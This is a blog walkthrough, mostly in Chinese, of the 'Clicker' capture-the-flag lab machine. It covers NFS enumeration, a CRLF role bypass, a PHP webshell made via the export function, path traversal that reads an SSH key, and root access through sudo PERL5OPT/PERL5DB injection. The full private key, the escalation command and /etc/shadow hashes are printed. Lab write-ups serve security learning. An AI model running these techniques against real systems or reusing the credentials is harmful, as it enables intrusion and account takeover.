Zumpyx Blog

Clicker

Machines#564MediumLinux

Recon & Enum

export IP=10.10.11.232

Nmap

  • TCP - Scan
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 89:d7:39:34:58:a0:ea:a1:db:c1:3d:14:ec:5d:5a:92 (ECDSA)
|_  256 b4:da:8d:af:65:9c:bb:f0:71:d5:13:50:ed:d8:11:30 (ED25519)
80/tcp    open  http     Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Did not follow redirect to http://clicker.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      35313/tcp6  mountd
|   100005  1,2,3      39393/tcp   mountd
|   100005  1,2,3      48411/udp   mountd
|   100005  1,2,3      59425/udp6  mountd
|   100021  1,3,4      33875/udp6  nlockmgr
|   100021  1,3,4      34119/tcp6  nlockmgr
|   100021  1,3,4      42749/tcp   nlockmgr
|   100021  1,3,4      44647/udp   nlockmgr
|   100024  1          37310/udp6  status
|   100024  1          48201/tcp6  status
|   100024  1          51059/tcp   status
|   100024  1          57948/udp   status
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/tcp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
36661/tcp open  mountd   1-3 (RPC #100005)
39393/tcp open  mountd   1-3 (RPC #100005)
42749/tcp open  nlockmgr 1-4 (RPC #100021)
51059/tcp open  status   1 (RPC #100024)
56511/tcp open  mountd   1-3 (RPC #100005)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 - 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NFS

image-20240119101913134.png

  • 挂载 mount -t nfs [-o vers=2] $IP:/mnt/backups /mnt/backups -o nolock

image-20240119102155212.png

发现 zip 文件,内容是 Web 站点源码

image-20240119103158891.png

Web

Web 页面有注册、登录、查看信息三个功能

image-20240119103249388.png

审计代码

  • 注册处对用户名有过滤

image-20240119110855346.png

  • 有两个直接拼接的 SQL 语句

image-20240119110936055.png

  • 发现一个 role 参数,似乎可以越权

image-20240119111027196.png

image-20240119111358111.png

Shell as User - www-data

  • 使用 CRLF 手法绕过限制

image-20240119111546616.png

  • 重新登录发现为管理员权限

image-20240119111637256.png

  • 管理员界面可以看到分数排行,还可以导出

image-20240119111937396.png

  • 关于导出接口,看到代码出可以导出任意格式

image-20240119112118795.png

  • 尝试导出为 php 文件

image-20240119112149746.png

  • 导出文件

image-20240119112348089.png

  • 尝试修改页面内容,配合之前发现的 save_game.php 文件,尝试修改 username

image-20240119112736501.png

  • 页面没啥变化

image-20240119112751048.png

  • 发现这里的字段名是 Nickname,在看到 authenticate.php 文件

image-20240119112910210.png

  • 修改 nickname

image-20240119112933869.png

  • 由于前面改了 username 导致 username 改变,但是位置不对,所以并没有解析

image-20240119113932773.png

  • 重新注册账号操作,先修改分数

image-20240119114323380.png

  • 修改 nickname

image-20240119144119247.png

image-20240119114412037.png

  • 导出为 php 文件

image-20240119144108851.png

  • Reverse Shell

image-20240119144717985.png

跑一下 Linpeas

  • 发现 Suid 文件

image-20240119145239004.png

Shell as user

  • 反编译

image-20240119150817334.png

发现当第一个参数不为 0-4 时,会传入第二个参数,结合前面几个数据库文件,猜测此程序的行为应该是使用 MySQL 执行 .sql 文件。

  • 创建 /tmp/123 尝试读取, 发现可以使用相对路径读取

image-20240119151110038.png

  • 尝试读取 jack 的 id_rsa,多次尝试,相对路径为 ../.ssh/id_rsa

image-20240119151305400.png

  • 密钥的格式会有点小问题,把首行与末行换位本地的 id_rsa 文件内容即可,权限设置为 0600
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
  • 登录 jack,查看 sudo 权限

image-20240119151856799.png

Shell as root

image-20240119152727456.png

脚本设置了环境变量,很难劫持,另外发现一个 xml_pp,发现时 perl 脚本

image-20240119152807328.png

  • 可以利用漏洞

image-20240119152859211.png

image-20240119152925473.png

大致原理就是,当启动 Perl 脚本时,会先加载执行 PERL5OPT 变量内容,刚好此变量没有被脚本清除

  • sudo PERL5OPT=-d PERL5DB='exec "cp /bin/bash /tmp/shell;chmod +s /tmp/shell"' /opt/monitor.sh

image-20240119154131356.png

Dump hash

cat /etc/shadow
---
root:$y$j9T$HwhGTqLOk.g0jLRSGt.RE.$eZjvzgetAedblJFhUTKXR3a90xzWaxtNLuQy4GSfg50:19566:0:99999:7:::
daemon:*:19405:0:99999:7:::
bin:*:19405:0:99999:7:::
sys:*:19405:0:99999:7:::
sync:*:19405:0:99999:7:::
games:*:19405:0:99999:7:::
man:*:19405:0:99999:7:::
lp:*:19405:0:99999:7:::
mail:*:19405:0:99999:7:::
news:*:19405:0:99999:7:::
uucp:*:19405:0:99999:7:::
proxy:*:19405:0:99999:7:::
www-data:*:19405:0:99999:7:::
backup:*:19405:0:99999:7:::
list:*:19405:0:99999:7:::
irc:*:19405:0:99999:7:::
gnats:*:19405:0:99999:7:::
nobody:*:19405:0:99999:7:::
_apt:*:19405:0:99999:7:::
systemd-network:*:19405:0:99999:7:::
systemd-resolve:*:19405:0:99999:7:::
messagebus:*:19405:0:99999:7:::
systemd-timesync:*:19405:0:99999:7:::
pollinate:*:19405:0:99999:7:::
sshd:*:19405:0:99999:7:::
syslog:*:19405:0:99999:7:::
uuidd:*:19405:0:99999:7:::
tcpdump:*:19405:0:99999:7:::
tss:*:19405:0:99999:7:::
landscape:*:19405:0:99999:7:::
fwupd-refresh:*:19405:0:99999:7:::
usbmux:*:19413:0:99999:7:::
jack:$y$j9T$9Z9lna0X87kIw1tXnLTI61$gM1HT7u59YfJwh6hGnM/pnq.EVyrRy9GNTevOgq6AW7:19415:0:99999:7:::
lxd:!:19413::::::
mysql:!:19413:0:99999:7:::
_rpc:*:19415:0:99999:7:::
statd:*:19415:0:99999:7:::
_laurel:!:19605::::::